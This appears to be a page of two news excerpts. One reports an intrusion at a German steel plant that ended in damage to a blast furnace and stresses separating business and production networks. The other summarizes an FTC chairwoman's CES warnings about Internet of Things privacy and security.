Once the attackers got a foothold on one system, they were able to explore the company’s networks, eventually compromising a “multitude” of systems, including industrial components on the production network. “Failures accumulated in individual control components or entire systems,” the report notes. As a result, the plant was “unable to shut down a blast furnace in a regulated manner” which resulted in “massive damage to the system.”

According to the report, the attackers appeared to possess advanced knowledge of industrial control systems. “The know-how of the attacker was very pronounced not only in conventional IT security but extended to detailed knowledge of applied industrial controls and production processes,” the report says.

The report doesn’t name the plant or indicate when the breach first occurred or how long the hackers were in the network before the destruction occurred. It’s also unclear if the attackers intended to cause the physical destruction or if this was simply collateral damage. The incident underscores, however, what experts have been warning about in the wake of Stuxnet: although that nation-state digital weapon had been expertly designed to avoid collateral damage, not all intrusions into critical infrastructure are likely to be as careful or as well-designed as Stuxnet, so damage may occur even when the hackers never intend it.

The report also illustrates the need for strict separation between business and production networks to keep hackers from leaping from one network to another and remotely accessing critical systems over the internet. Although a network can only be considered truly air-gapped if it’s not connected to the internet and is not connected to other systems that are connected to the internet, many companies believe that a software firewall separating the business and production network is sufficient to stop hackers from making that leap.
But experts warn that a software firewall can be misconfigured or contain security holes that allow hackers to break through or bypass them nonetheless. It’s not known how the German network was configured. Source
-
- 2
-
Federal Trade Commission (FTC) Chairwoman Edith Ramirez used her opening remarks at the International Consumer Electronic Show (CES) on Tuesday to warn attendees of the future privacy issues the Internet of Things (IoT) could stir up. In 2015, she said there would be 25 billion connected devices and smart home devices will reach nearly 25 million, which could allow for the start of “smart-home hacking” and major privacy concerns. “Connected devices that provide increased convenience and improve health services are also collecting, transmitting, storing and often sharing vast amounts of consumer data, some of it highly personal, thereby creating a number of privacy risks,” she said. Companies creating devices should take particular interest in ensuring consumers' privacy and security, Ramirez said. Specifically, “security by design” should be adopted, which would have companies perform risk assessment for their designs, keeping privacy and security in mind. This security mindset would also involve “smart defaults,” including having users change default passwords during the set-up process. Ramirez urged the companies to consider encryption, especially when dealing with sensitive information. They also need to monitor products throughout their life cycle to keep up on identifying and patching vulnerabilities, she said. Additionally, the chairwoman advised that any personal data that is collected should follow “the principle of data minimization,” or only collecting information that is specifically needed. The data should be removed responsibly, as well. Ramirez closed her speech by saying that as companies invest billions of dollars in IoT, they should also “make appropriate investments in privacy and security.” Source